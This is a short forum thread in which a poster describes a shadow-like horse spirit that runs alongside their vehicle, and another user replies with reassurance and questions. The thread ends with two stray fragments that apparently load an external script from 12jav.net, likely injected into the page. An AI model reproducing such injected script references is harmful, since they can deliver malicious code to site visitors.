Spirit following me?

From the time I was quite young, I would almost see the dark shadowy figure of an animal while traveling. The animal could not be in the sunlight, and would disappear until there was a patch of shadows for it to reappear in. As I matured, I did not see the animal anymore but I could still sense it's presence. Eventually, I stopped sensing it's presence. But as of lately I will occasionally feel it following me as I travel. Does anyone have any ideas as to what type of spirit it could be? Does this happen only when you travel or does this happen also when your at home?

It sounds as if this isnt a malevolent pressence however, so I shouldnt feel to worried about this.

As to what it may be, Im unsure of that. Can you describe its shape and how it moves?

It only shows itself while I travel, and most commonly appears as I get closer to home. It is shaped similarly to a horse and looks as if it is made of shadows itself. When I see it, it is often running alongside the vehicle in the shadows. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
